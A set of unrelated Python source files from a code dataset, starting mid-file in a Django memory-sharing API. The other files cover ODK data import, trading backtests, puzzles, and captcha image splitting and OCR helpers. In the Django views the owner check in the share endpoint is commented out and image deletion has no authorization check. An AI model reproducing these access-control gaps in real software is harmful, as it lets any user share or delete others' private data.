Memory.objects.get(id=memory_id)\r\n userIDs = request.data[\"shared_with\"]\r\n replace = request.query_params[\"replace\"]\r\n\r\n # if memory.owner.id != request.user.id:\r\n # return Response({\"error\": \"unauthorized\"})\r\n\r\n try:\r\n\r\n if replace == \"true\":\r\n memory.shared_with.set(request.data[\"shared_with\"])\r\n else:\r\n for userID in userIDs:\r\n memory.shared_with.add(userID)\r\n\r\n if len(list(memory.shared_with.all())):\r\n memory.shared = True\r\n else:\r\n memory.shared = False\r\n\r\n memory.save()\r\n serializer = MemoryDetailsSerializer(memory)\r\n\r\n return Response({\"memory\": serializer.data})\r\n except:\r\n return Response({})\r\n\r\n\r\n@api_view([\"GET\"])\r\n@permission_classes([IsAuthenticated])\r\ndef search_memory(request):\r\n query = request.query_params[\"query\"]\r\n memories = Memory.objects.filter(\r\n Q(title__icontains=query) | Q(description__icontains=query) | Q(date__icontains=query) | Q(category__icontains=query)).filter(Q(owner=request.user) | Q(memory_space__users__id=request.user.id)).distinct()\r\n serializer = MemorySerializer(memories, many=True)\r\n return Response({\"memories\": serializer.data})\r\n\r\n\r\n@api_view([\"DELETE\"])\r\n@permission_classes([IsAuthenticated])\r\ndef delete_memory(request, memory_id):\r\n memory = Memory.objects.get(id=memory_id)\r\n\r\n if memory.owner.id != request.user.id:\r\n return Response({\"error\": \"unauthorized\"})\r\n\r\n memory.delete()\r\n\r\n return Response({})\r\n\r\n\r\n@api_view([\"POST\"])\r\n@permission_classes([IsAuthenticated])\r\ndef add_images(request, memory_id):\r\n memory = Memory.objects.get(id=memory_id)\r\n\r\n if memory.memory_space:\r\n if request.user not in memory.memory_space.users.all():\r\n return Response({\"error\": \"unauthorized\"})\r\n else:\r\n if memory.owner.id != request.user.id:\r\n return Response({\"error\": \"unauthorized\"})\r\n\r\n images = request.FILES.getlist(\"images\")\r\n images_to_serialize = []\r\n serialized_images = []\r\n\r\n if images:\r\n for image in images:\r\n images_to_serialize.append({ \"image\": image, \"memory\": memory.id })\r\n\r\n serializer = ImageSerializer(data = images_to_serialize[:14], many = True)\r\n\r\n if serializer.is_valid():\r\n serializer.save()\r\n\r\n if not memory.preview:\r\n memory.preview = serializer.data[0][\"image\"][60:]\r\n memory.save()\r\n print(memory)\r\n serialized_images = serializer.data\r\n else:\r\n return Response({\"errors\": serializer.errors})\r\n\r\n\r\n return Response({\"images\": serialized_images})\r\n\r\n\r\n@api_view([\"DELETE\"])\r\n@permission_classes([IsAuthenticated])\r\ndef delete_image(request, image_id):\r\n image = Image.objects.get(id=image_id)\r\n memory = Memory.objects.get(id=image.memory.id)\r\n image.delete()\r\n memory_images = Image.objects.filter(memory=memory)\r\n\r\n if (len(memory_images)) > 0:\r\n image_serializer = ImageSerializer(memory_images[0], many=False)\r\n memory.preview = image_serializer.data[\"image\"][60:]\r\n else:\r\n memory.preview = None\r\n\r\n memory.save()\r\n\r\n return Response({})\r\n\r\n\r\n@ api_view([\"POST\"])\r\n@ permission_classes([IsAuthenticated])\r\ndef create_memory_space(request):\r\n serializer = MemorySpaceSerializer(data=request.data, many=False)\r\n\r\n try:\r\n if serializer.is_valid():\r\n memory_space = serializer.save()\r\n memory_space.users.add(request.user)\r\n memory_space.created_by = request.user\r\n memory_space.save()\r\n\r\n return Response({\"memory_space\": serializer.data}, status=201)\r\n else:\r\n return Response({\"errors\": serializer.errors})\r\n except:\r\n return Response({})\r\n\r\n\r\n@ api_view([\"GET\"])\r\n@ permission_classes([IsAuthenticated])\r\ndef get_memory_spaces(request):\r\n page_number = request.query_params.get(\"page\") or 1\r\n\r\n memory_spaces = MemorySpace.objects.filter(users__id=request.user.id)\r\n paginator = Paginator(memory_spaces, 5)\r\n page = paginator.get_page(page_number)\r\n serializer = MemorySpaceSerializer(page.object_list, many=True)\r\n\r\n return Response({\"memory_spaces\": serializer.data, \"has_next\": page.has_next(), \"has_prev\": page.has_previous()})\r\n\r\n\r\n@ api_view([\"GET\"])\r\n@ permission_classes([IsAuthenticated])\r\ndef get_memory_space_details(request, memory_space_id):\r\n memory_space = None\r\n\r\n try:\r\n memory_space = MemorySpace.objects.get(id=memory_space_id)\r\n except:\r\n return Response({\"error\": \"not found\"})\r\n\r\n if request.user not in memory_space.users.all():\r\n return Response({\"error\": \"unauthorized\"})\r\n\r\n memories = Memory.objects.filter(memory_space=memory_space)\r\n serializer = MemorySpaceDetailsSerializer(memory_space)\r\n memory_serializer = MemorySerializer(memories, many=True)\r\n\r\n return Response({\"memory_space\": serializer.data, \"memories\": memory_serializer.data})\r\n\r\n\r\n@api_view([\"PATCH\"])\r\n@permission_classes([IsAuthenticated])\r\ndef edit_memory_space(request, memory_space_id):\r\n memory_space = None\r\n\r\n try:\r\n memory_space = MemorySpace.objects.get(id=memory_space_id)\r\n except:\r\n return Response({\"error\": \"not found\"})\r\n\r\n if request.user not in memory_space.users.all():\r\n return Response({\"error\": \"unauthorized\"})\r\n\r\n serializer = MemorySpaceSerializer(\r\n memory_space, data=request.data, partial=True)\r\n\r\n if serializer.is_valid():\r\n serializer.save()\r\n return Response({\"memory_space\": serializer.data})\r\n\r\n return Response({\"errors\": serializer.errors})\r\n\r\n\r\n@api_view([\"DELETE\"])\r\n@permission_classes([IsAuthenticated])\r\ndef delete_memory_space(request, memory_space_id):\r\n memory_space = None\r\n\r\n try:\r\n memory_space = MemorySpace.objects.get(id=memory_space_id)\r\n except:\r\n return Response({\"error\": \"not found\"})\r\n\r\n if request.user not in memory_space.users.all():\r\n return Response({\"error\": \"unauthorized\"})\r\n\r\n memory_space.delete()\r\n\r\n return Response({})\r\n\r\n\r\n@api_view([\"GET\"])\r\n@permission_classes([IsAuthenticated])\r\ndef search_memory_space(request):\r\n query = request.query_params.get(\"query\")\r\n memory_spaces = MemorySpace.objects.filter(\r\n Q(name=query) | Q(description__icontains=query)).filter(Q(users__id=request.user.id))\r\n serializer = MemorySpaceSerializer(memory_spaces, many=True)\r\n return Response({\"memory_spaces\": serializer.data})\r\n\r\n\r\n@api_view([\"PATCH\"])\r\n@permission_classes([IsAuthenticated])\r\ndef add_memory_space_members(request, memory_space_id):\r\n memory_space = None\r\n replace = request.query_params[\"replace\"]\r\n\r\n try:\r\n memory_space = MemorySpace.objects.get(id=memory_space_id)\r\n except:\r\n return Response({\"error\": \"not found\"})\r\n\r\n if request.user not in memory_space.users.all():\r\n return Response({\"error\": \"unauthorized\"})\r\n\r\n if replace == \"true\":\r\n memory_space.users.set(request.data[\"members\"])\r\n else:\r\n for userID in request.data[\"members\"]:\r\n memory_space.users.add(userID)\r\n\r\n memory_space.save()\r\n serializer = MemorySpaceDetailsSerializer(memory_space)\r\n\r\n return Response({\"memory_space\": serializer.data})\r\n\r\ndef send_email (subject, body, recepient):\r\n email = EmailMessage(\r\n subject,\r\n body,\r\n settings.EMAIL_HOST_USER,\r\n [recepient]\r\n )\r\n email.fail_silently = False\r\n email.send()\r\n","repo_name":"pratiic/never-fade","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3469405326","text":"# -*- coding:utf-8 -*-\n\nfrom PIL import Image\nimport sys\n\n\ndef fill_image(image):\n width, height = image.size\n print(width, height)\n\n new_image_length = width if width > height else height\n\n print(new_image_length)\n\n # new_image = Image.new(image.mode, (new_image_length, new_image_length), color='white')\n new_image = Image.new(image.mode, (width, height), color='white')\n\n new_image.paste(image, (0, 0))\n return new_image\n\n\ndef cut_image(image):\n width, height = image.size\n item_width = int(width / 2)\n item_height = int (height)\n box_list = []\n for i in range(2):\n box = (i * item_width, 0 * item_height, (i + 1) * item_width, 1 * item_height)\n box_list.append(box)\n image_list = [image.crop(box) for box in box_list]\n return image_list\n\n\ndef save_images(image_list):\n index = 1\n for image in image_list:\n image.save(r'../pic/result/' + str(index) + r'.png')\n index += 1\n\n\nif __name__ == '__main__':\n file_path = \"yidun_img_0.jpg\"\n # 打开图像\n image = Image.open(file_path)\n # 将图像转为正方形,不够的地方补充为白色底色\n image = fill_image(image)\n # 分为图像\n image_list = cut_image(image)\n # 保存图像\n save_images(image_list)","repo_name":"lenfranky/slide_block_operation","sub_path":"Verification/pic_division.py","file_name":"pic_division.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25073483899","text":"\"\"\"The main processing unit for processing ODK options\n\n\"\"\"\nimport csv\nimport re\nimport datetime\nimport uuid\nimport pytz\nimport json\n\nfrom django.db import transaction\nfrom django.utils import timezone\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom raven import Client\n\nfrom .terminal_output import Terminal\nfrom .models import Recipients, DictionaryItems, SubCounty, Ward, Village, RawSubmissions, SyndromicIncidences\n\nterminal = Terminal()\nsentry = Client(settings.SENTRY_DSN)\n\nsettings.TIME_ZONE\ncurrent_tz = pytz.timezone(settings.TIMEZONE)\ntimezone.activate(current_tz)\n\n\nclass ImportODKChoices():\n def __init__(self):\n # silence is golden\n self.module_name = 'Processing ODK Choices'\n # the mandatory headers for the choices spreadsheet\n self.odk_mandatory_headers = ['list_name', 'name', 'label', 'county', 'syndromes', 'disease', 'cdr_village', 'ward_subcounty', 'village_ward', 'enumerator_subcounty']\n self.phone_number_update_headers = ['username', 'phone_number']\n\n def process_odk_choices_file(self, input_file):\n terminal.tprint('Processing the file %s...' % input_file, 'info')\n\n try:\n transaction.set_autocommit(False)\n with open(input_file, 'rt', -1, 'utf-8') as in_file:\n test_data = csv.DictReader(in_file, delimiter=',', quotechar='\"')\n self.confirm_data_headers(test_data.fieldnames, self.odk_mandatory_headers)\n for row in test_data:\n # print(row.values())\n try:\n if row['list_name'] == 'sub_county':\n self.process_subcounty(row)\n elif row['list_name'] == 'wards':\n self.process_ward(row)\n elif row['list_name'] == 'villages':\n self.process_village(row)\n elif row['list_name'] == 'cdrs':\n self.process_personnel(row, 'cdr')\n elif row['list_name'] == 'enumerators':\n self.process_personnel(row, 'enumerator')\n elif row['list_name'] == 'livhealth_mgmnt':\n self.process_personnel(row, 'livhealth_mgmnt')\n elif row['list_name'] == 'livhealth_admin':\n self.process_personnel(row, 'livhealth_admin')\n except ObjectDoesNotExist:\n continue\n except UnicodeDecodeError as e:\n terminal.tprint(\"Cannot process the data below.\\n%s\" % str(e), 'fail')\n except Exception as e:\n transaction.rollback()\n sentry.captureException()\n terminal.tprint(str(e), 'fail')\n\n transaction.commit()\n terminal.tprint(\"The input file '%s' with test data has been processed successfully...\" % input_file, 'info')\n\n def confirm_data_headers(self, file_headers, mandatory_headers):\n missing_headers = []\n for header in mandatory_headers:\n if header not in file_headers:\n missing_headers.append(header)\n\n if len(missing_headers):\n raise Exception(\"The input file is missing '%s' column(s) which is required\" % ', '.join(missing_headers))\n\n def process_subcounty(self, subcounty):\n \"\"\"Given a sub county details, add it to the database if it does not exist\n\n \"\"\"\n try:\n sub_county = SubCounty.objects.filter(nick_name=subcounty['name'].strip()).get()\n except SubCounty.DoesNotExist:\n try:\n sub_county = SubCounty(\n sub_county_name=subcounty['label'].strip(),\n nick_name=subcounty['name'].strip()\n )\n sub_county.full_clean()\n sub_county.save()\n except Exception:\n raise\n except Exception:\n raise\n\n return sub_county\n\n def process_ward(self, ward):\n \"\"\"Given a ward details, add it to the database if it does not exist\n \"\"\"\n try:\n saved_ward = Ward.objects.filter(nick_name=ward['name'].strip()).get()\n except Ward.DoesNotExist:\n try:\n # get the subcounty of this ward\n sub_county = SubCounty.objects.filter(nick_name=ward['ward_subcounty'].strip()).get()\n saved_ward = Ward(\n ward_name=ward['label'].strip(),\n nick_name=ward['name'].strip(),\n sub_county=sub_county\n )\n saved_ward.full_clean()\n saved_ward.save()\n except SubCounty.DoesNotExist:\n message = \"'%s' sub county does not exist in the database.\" % ward['ward_subcounty'].strip()\n terminal.tprint(message, 'info')\n raise ObjectDoesNotExist(message)\n except Exception:\n raise\n except Exception:\n raise\n\n return saved_ward\n\n def process_village(self, village):\n \"\"\"Given a ward details, add it to the database if it does not exist\n \"\"\"\n try:\n saved_village = Village.objects.filter(nick_name=village['name'].strip()).get()\n except Village.DoesNotExist:\n try:\n # get the ward of the current village\n ward = Ward.objects.filter(nick_name=village['village_ward'].strip()).get()\n saved_village = Village(\n village_name=village['label'].strip(),\n nick_name=village['name'].strip(),\n ward=ward\n )\n saved_village.full_clean()\n saved_village.save()\n except Ward.DoesNotExist:\n message = \"'%s' ward does not exist in the database.\" % village['village_ward'].strip()\n terminal.tprint(message, 'info')\n raise ObjectDoesNotExist(message)\n except Exception:\n raise\n except Exception:\n raise\n\n return saved_village \n\n def process_personnel(self, pers, pers_type):\n # we are only interested in updating CDR details\n # check if the cdr details are already saved in the database... if they are, update them if they are different\n try:\n personnel = Recipients.objects.filter(username=pers['name'].strip()).get()\n except Recipients.DoesNotExist:\n # the pers is not saved in the Recipients database, so lets add him\n # get the village of this CDR\n village = None\n sub_county = None\n try:\n if pers_type == 'cdr':\n village = Village.objects.filter(nick_name=pers['cdr_village'].strip()).get()\n elif pers_type == 'enumerator':\n sub_county = SubCounty.objects.filter(nick_name=pers['enumerator_subcounty']).get()\n else:\n sub_county = None\n\n cdr_label = pers['label'].strip()\n if re.search('^Dr|Mr|Mrs|Prof|Miss\\.?', cdr_label) is None:\n cdr_names = cdr_label.split()\n salutation = None\n else:\n # exclude the salutation, strip the remainder string of spaces and split it\n split_names = re.split('^(Dr|Mrs|Mr|Prof|Miss)\\.?', cdr_label)\n salutation = split_names[1:2][0]\n cdr_names = split_names[2:][0].strip().split()\n\n # print(\"%s == %s: %s - %s - %s\" % (cdr_label, salutation if salutation is not None else '', cdr_names[:1][0], ' '.join(cdr_names[1:]), pers['name'].strip()))\n personnel = Recipients(\n salutation=salutation,\n first_name=cdr_names[:1][0],\n other_names=None if len(cdr_names[1:]) == 0 else ' '.join(cdr_names[1:]),\n username=pers['name'].strip(),\n designation=pers_type,\n village=village,\n sub_county=sub_county\n )\n personnel.full_clean()\n personnel.save()\n except Village.DoesNotExist:\n terminal.tprint(\"'%s' village does not exist in the database.\" % pers['cdr_village'].strip(), 'info')\n except Exception:\n raise\n except Exception:\n raise\n\n def process_phone_numbers(self, input_file):\n # we have a list of phone numbers that we need to update in our contact list\n terminal.tprint('Processing the file %s...' % input_file, 'info')\n\n try:\n transaction.set_autocommit(False)\n with open(input_file, 'rt', -1, 'utf-8') as in_file:\n test_data = csv.DictReader(in_file, delimiter=',', quotechar='\"')\n self.confirm_data_headers(test_data.fieldnames, self.phone_number_update_headers)\n for row in test_data:\n # terminal.tprint(json.dumps(row), 'error')\n self.update_personnel(row)\n except UnicodeDecodeError as e:\n terminal.tprint(\"Cannot process the data below.\\n%s\" % str(e), 'fail')\n except Exception as e:\n transaction.rollback()\n sentry.captureException()\n terminal.tprint(str(e), 'fail')\n\n transaction.commit()\n terminal.tprint(\"The input file '%s' with test data has been processed successfully...\" % input_file, 'info')\n\n def update_personnel(self, pers):\n try:\n personnel = Recipients.objects.filter(username=pers['nick_name'].strip()).get()\n to_save = False\n processed_number = self.format_phone_number(pers['phone_number'])\n if 'email' in pers:\n if pers['email'].strip() != '':\n # we have some email... check if its ok first\n if re.search(\"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)\", pers['email']) is not None:\n personnel.recepient_email = pers['email'].strip()\n to_save = True\n\n if processed_number is not None:\n to_save = True\n if personnel.cell_no is None:\n personnel.cell_no = processed_number\n elif personnel.cell_no != processed_number:\n personnel.alternative_cell_no = processed_number\n\n if to_save:\n personnel.full_clean()\n personnel.save()\n except ValueError as e:\n terminal.tprint(str(e), 'fail')\n except Recipients.DoesNotExist:\n terminal.tprint(\"'%s' does not exist in the database, skipping them for now...\" % pers['username'].strip(), 'info')\n except Exception:\n raise\n\n def format_phone_number(self, phone_number):\n \"\"\"Given a phone number, format it to include the country code\n \"\"\"\n if phone_number == '':\n return None\n elif re.search('^7(\\d{8})$', phone_number) is not None:\n return '+2547%s' % re.split('^7(\\d{8})$', phone_number)[1:2][0]\n elif re.search('^0(\\d{9})$', phone_number) is not None:\n return '+254%s' % re.split('^0(\\d{9})$', phone_number)[1:2][0]\n elif re.search('^(\\d{9})$', phone_number) is not None:\n return '+2547%s' % re.split('^(\\d{9})$', phone_number)[1:2][0]\n elif re.search('^\\+254\\d{9}$', phone_number) is not None:\n return phone_number\n else:\n raise ValueError(\"Encountered a phone number '%s' of unknown format\" % phone_number)\n\n\n\nclass UpdateDatabase():\n def __init__(self):\n self.module_name = 'Updating database'\n\n def update_syndromic_submitter(self):\n # updates the details of the person who submitted the syndromic details\n submissions_2_update = SyndromicIncidences.objects.filter(scvo_reporter='not_set').all()\n\n updated = 0\n for subm in submissions_2_update:\n # get the raw submission for this record\n raw_subm = RawSubmissions.objects.filter(uuid=subm.uuid).values('raw_data', 'id').get() # we must have the raw submission with this uuid, else we are in shit\n\n print('Updating %s ..' % subm.uuid)\n subm.scvo_reporter = raw_subm['raw_data']['s1q4_enum']\n subm.publish()\n \n updated = updated + 1\n \n \n print('Updated %d records' % updated)","repo_name":"badili/livhealth_scripts","sub_path":"odk_choices_parser.py","file_name":"odk_choices_parser.py","file_ext":"py","file_size_in_byte":12636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42217905692","text":"#-*-coding:utf-8-*-\nfrom utils.get_selenium_driver import GetSeleniumDriver\nfrom pages.index_page import IndexPage\nfrom pages.login_page import LoginPage\nimport time\nimport os\nfrom PIL import Image\nimport pytesseract\nfrom PIL import ImageEnhance\nfrom utils.logger import Logger\nmylogger = Logger(__name__).getlog()\n\nclass CommonDef(object):\n def __init__(self):\n self.driver=GetSeleniumDriver().driver\n #滚动条下滑\n def huadong_gundongtiao(self):\n js1=\"var q=document.documentElement.scrollTop=10000\"\n self.driver.execute_script(js1)\n time.sleep(2)\n\n def huadong_gundoongtiao2(self,a):\n target =a\n self.driver.execute_script(\"arguments[0].scrollIntoView();\", target) #拖动到可见的元素去\n\n # def jubing(self):\n ##获取当前窗口句柄\n # nowhandle=self.driver.current_window_handle\n ##获取所有handle\n #allhandles=self.driver.window_handles\n # #循环,当句柄不等于首页句柄时,转换为现在的窗口句柄\n # for handle in allhandles:\n # if handle!=nowhandle:\n # self.driver.switch_to_window(handle)\n\n # 保存图片\n def get_windows_img(self,img_name):\n \"\"\"\n 在这里我们把file_path这个参数写死,直接保存到我们项目根目录的一个文件夹.\\Screenshots下\n \"\"\"\n file_path = os.path.dirname(os.path.abspath('.')) + '/picture/'\n rq = time.strftime('%Y%m%d%H%M%S', time.localtime(time.time()))\n screen_name = file_path + img_name+rq + '.png'\n try:\n self.driver.get_screenshot_as_file(screen_name)\n mylogger.debug(\"Had take screenshot and save to folder : /picture\")\n except NameError as e:\n mylogger.debug(\"Failed to take screenshot! %s\" % e)\n self.get_windows_img(screen_name)\n # # 保存图片\n # def get_windows_img(self):\n # \"\"\"\n # 在这里我们把file_path这个参数写死,直接保存到我们项目根目录的一个文件夹.\\Screenshots下\n # \"\"\"\n # file_path = os.path.dirname(os.path.abspath('.')) + '/picture/'\n # rq = time.strftime('%Y%m%d%H%M%S', time.localtime(time.time()))\n # screen_name = file_path + rq + '.png'\n # try:\n # self.driver.get_screenshot_as_file(screen_name)\n # mylogger.debug(\"Had take screenshot and save to folder : /picture\")\n # except NameError as e:\n # mylogger.debug(\"Failed to take screenshot! %s\" % e)\n # self.get_windows_img()\n\n def login(self,url,username,password):\n #self.driver = GetSeleniumDriver().driver\n self.driver.get(url)\n time.sleep(1)\n self.driver.maximize_window()\n time.sleep(1)\n #点击请登录\n IndexPage().click_login_link().click()\n time.sleep(1)\n #输入用户名\n LoginPage().click_username().send_keys(username)\n time.sleep(1)\n #输入密码\n LoginPage().click_password().send_keys(password)\n #点击登录按钮\n LoginPage().click_login_submit().click()\n time.sleep(1)\n #输入验证码\n #获取截图\n # dir_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n # image_path=os.path.join(dir_path,'picture\\screenshot.png')\n # self.driver.get_screenshot_as_file(image_path)\n #\n # #获取指定元素位置\n # element = self.driver.find_element_by_id('js_code_img')\n # left = int(element.location['x'])\n # top = int(element.location['y'])\n # right = int(element.location['x'] + element.size['width'])\n # bottom = int(element.location['y'] + element.size['height'])\n #\n # #通过Image处理图像\n # im = Image.open(image_path)\n # im = im.crop((left, top, right, bottom))\n # code_path=os.path.join(dir_path,'picture\\code.png')\n # im.save(code_path)\n # image=Image.open(code_path)\n # image = image.convert('L') #图像加强,二值化,PIL中有九种不同模式。分别为1,L,P,RGB,RGBA,CMYK,YCbCr,I,F。L为灰度图像\n # sharpness =ImageEnhance.Contrast(image)#对比度增强\n # image = sharpness.enhance(3.0) #3.0为图像的饱和度\n # image.show()\n # vcode=pytesseract.image_to_string(image)\n # time.sleep(1)\n # print vcode\n # time.sleep(1)\n # #输入验证码\n # LoginPage().input_code().send_keys(vcode.strip())\n #\n # time.sleep(3)\n # #点击登录按钮\n # LoginPage().click_login_submit().click()\n # time.sleep(3)\n\n def quit(self):\n self.driver.quit()","repo_name":"meixiaoqiu1/jinbi","sub_path":"common_method/common_def.py","file_name":"common_def.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"4520525563","text":"# Sample Input :\n# 5\n# Sample Output :\n# 11111\n# 0000\n# 111\n# 00\n# 1\n\ndef binary_pattern(n):\n for rows in range(1,n+1):\n flag = 1\n if rows %2 == 0:\n flag = 0\n for col in range(1,n-rows+2):\n print(flag,end=\"\")\n print()\n return\n\nn = int(input())\nbinary_pattern(n)\n","repo_name":"psmohammedali/Python_Series","sub_path":"for_loops/binary_pattern.py","file_name":"binary_pattern.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"6581078969","text":"from backtesting import Backtest, Strategy\nfrom backtesting.lib import crossover\nimport pandas as pd\nfrom os import listdir, path\nfrom os.path import isfile, join\nfrom backtesting.test import SMA, GOOG\nfrom collections import deque\nfrom tensorflow import keras\nimport tensorflow as tf\nimport numpy as np\n\nDATAFOLDER = f'NoUploadData'\nRATIO_TO_PREDICT = \"IBM\"\nSEQ_LEN = 60 \nNAME = f\"DATA-LEN-10-SEQ-60\"\n\n# uncomment to force CPU\ntf.config.experimental.set_visible_devices([], \"DML\")\n\ndef loadDataFrame(name):\n df = pd.read_feather(name)\n #print(df)\n df.set_index(\"timestamp\", inplace=True)\n return df\n\nclass RNNStrategy(Strategy):\n\n def init(self):\n self.rolled_data = deque(maxlen=SEQ_LEN)\n model_name = f\"ModelTraining\\models\\{NAME}\"\n print(\"ModelTraining\\models\\{}\".format(NAME))\n self.model = keras.models.load_model(\"ModelTraining\\models\\{}\".format(NAME), compile=True)\n self.lastWasBuy = False\n\n def next(self):\n\n #print(self.data.df)\n\n #self.rolled_data.append([n for n in self.data.df.values[-1]]) # store all but the target\n sub_df = self.data.df[[f\"Close\", f\"High\", f\"Low\", f\"Volume\"]]\n #print(sub_df)\n for col in sub_df.columns:\n sub_df[col] = sub_df[col].pct_change() # pct change \"normalizes\" the different currencies (each crypto coin has vastly diff values, we're really more interested in the other coin's movements)\n pd.set_option('use_inf_as_na', True)\n sub_df.dropna(inplace=True)\n if (len(sub_df.values) == 0):\n return\n print(sub_df)\n input_data = np.array([n for n in sub_df.values[-1]])\n\n sequential_data = []\n prev_days = deque(maxlen=SEQ_LEN) # These will be our actual sequences. They are made with deque, which keeps the maximum length by popping out older values as new ones come in\n\n if (len(sub_df.values) < SEQ_LEN):\n return\n last_60 = sub_df.values[-SEQ_LEN:]\n for i in last_60: # iterate over the values\n prev_days.append([n for n in i]) # store all but the target\n sequential_data.append([prev_days]) # append those bad boys!\n\n\n sequential_data = np.asarray(sequential_data[0])\n #print(sequential_data.shape)\n #print(sequential_data)\n decision = self.model.predict(sequential_data)\n print(f\"decision: {decision}\")\n if decision[0][0] > 0.5 and self.lastWasBuy == False:\n self.buy()\n self.lastWasBuy = True\n elif decision[0][1] > 0.5 and self.lastWasBuy == True:\n self.sell()\n self.lastWasBuy = False\n\nloaded_df = loadDataFrame(f'{DATAFOLDER}/{RATIO_TO_PREDICT}.fed')\nloaded_df = loaded_df.rename(columns={\"open\":\"Open\", \"high\":\"High\", \"low\":\"Low\", \"close\":\"Close\", \"volume\":\"Volume\"})\nprint(len(loaded_df))\nloaded_df = loaded_df.sort_index()[200:800] # hard limite for the first 5000 minutes\nprint(loaded_df)\n\nbt = Backtest(loaded_df, RNNStrategy, commission=.002,\n exclusive_orders=True)\nstats = bt.run()\nbt.plot()\n\n","repo_name":"paulbaron/Le_Bot_Francais","sub_path":"QATesting/BacktestingWithNN.py","file_name":"BacktestingWithNN.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6321806007","text":"#!/bin/python\n\n'''\n@joseanavarrete\n\nCat vs Dog Spotify puzzle\n\nhttps://labs.spotify.com/puzzles/\n'''\n\nimport unittest\n\n\nclass CatVsDogContest(object):\n def __init__(self, n_cats, n_dogs, votes):\n self.votes = self._init_votes(n_cats, n_dogs)\n for stay, leave in votes:\n self.votes[stay] += 1\n \n def max_num_satisfied_voters(self):\n ''' Gets the max upvotes number '''\n return str(max(self.votes.values()))\n\n def _init_votes(self, n_cats, n_dogs):\n cats = list(map(lambda x: 'C' + str(x), range(1, n_cats+1)))\n dogs = list(map(lambda x: 'D' + str(x), range(1, n_dogs+1)))\n initial_votes = [0] * (n_cats+n_dogs)\n return dict(zip(cats+dogs, initial_votes))\n\nclass TestCatVsDogContest(unittest.TestCase):\n def setUp(self):\n '''Init expected_output and contest list based on given data _data'''\n self.expected_output = \"\"\"1\n3\n3\"\"\"\n _data = \"\"\"3\n1 1 2\nC1 D1\nD1 C1\n1 2 4\nC1 D1\nC1 D1\nC1 D2\nD2 C1\n2 2 6\nC1 D1\nD1 C2\nD1 C1\nD2 C2\nC1 D2\nD1 C1\"\"\"\n\n data_lines = _data.splitlines()\n n_test_cases = int(data_lines[0])\n n_configs = 0\n config_case_position = 1\n self.contest_cases = []\n\n while n_configs < n_test_cases:\n n_cats, n_dogs, n_voters = tuple(\n map(int, data_lines[config_case_position].split(' ')))\n votes = [\n tuple(l.split(' '))\n for l in data_lines[config_case_position+1:config_case_position+n_voters+1]\n ]\n contest = CatVsDogContest(n_cats, n_dogs, votes)\n self.contest_cases.append(contest)\n n_configs += 1\n config_case_position += n_voters+1\n\n def test_max_num_satisfied_voters(self):\n '''\n Creates a list of satisfied voters per test case and\n joins it in a multiline string\n '''\n max_num_satisfied_voters = []\n for contest in self.contest_cases:\n max_num_satisfied_voters.append(contest.max_num_satisfied_voters())\n\n self.assertEqual('\\n'.join(max_num_satisfied_voters),\n self.expected_output)\n\ndef main():\n unittest.main()\n\nif __name__ == '__main__':\n main()\n","repo_name":"josenava/spotify_puzzle","sub_path":"cat_vs_dog.py","file_name":"cat_vs_dog.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18666770146","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\"\"\"\n给你一个仅由字符 '0' 和 '1' 组成的字符串 s 。一步操作中,你可以将任一 '0' 变成 '1' ,或者将 '1' 变成 '0' 。\n\n交替字符串 定义为:如果字符串中不存在相邻两个字符相等的情况,那么该字符串就是交替字符串。例如,字符串 \"010\" 是交替字符串,而字符串 \"0100\" 不是。\n\n返回使 s 变成 交替字符串 所需的 最少 操作数。\n\"\"\"\n\n\nclass Solution:\n def minOperations(self, s: str) -> int:\n diff1 = diff2 = 0\n for i, a in enumerate(s):\n if a == \"1\":\n diff1 += i % 2 == 0\n diff2 += i % 2 == 1\n else:\n diff1 += i % 2 == 1\n diff2 += i % 2 == 0\n return min(diff1, diff2)\n\n\ns = \"0010010\"\nsol = Solution()\nres = sol.minOperations(s)\nprint(res)\n","repo_name":"LikeSco/learn-python","sub_path":"py-exam/1758.minOperations.py","file_name":"1758.minOperations.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"5486937652","text":"# -*- coding: utf-8 -*-\n\nfrom mantra.util import parseMention\n\nfrom .util.pl import plugin\n\n\n@plugin(group='Fun')\nasync def gift(self, msg, args):\n if msg.toType in {1, 2}:\n mids = parseMention(msg)\n if mids is not None:\n for mid in mids:\n await self.sendPresent(mid)\n await self.sendText(msg.to, \"「 Gift 」\\nGift sent.\")\n return\n await self.sendPresent(msg.to)\n\n","repo_name":"Shivelight/Mantra-Client","sub_path":"plugins/fun2.py","file_name":"fun2.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15014212761","text":"#import sys\n#import time\nimport cv2\nimport matplotlib as mpl\nmpl.use('GTKAgg')\nfrom matplotlib import pyplot as plt\n#import numpy as np\n \nimport logging\nlogging.basicConfig(level = logging.INFO)\nlogger = logging.getLogger(__name__)\n \nclass RectBuilder:\n def __init__(self, rect, x, y, width, height):\n self.rect = rect\n self.x, self.y, self.width, self.height = x, y, width, height\n \n self.first_click = True \n self.rect.figure.canvas.mpl_connect('button_press_event', self._click)\n \n# self.label = ''\n# self.rect.figure.canvas.mpl_connect('key_press_event', self._press)\n \n def 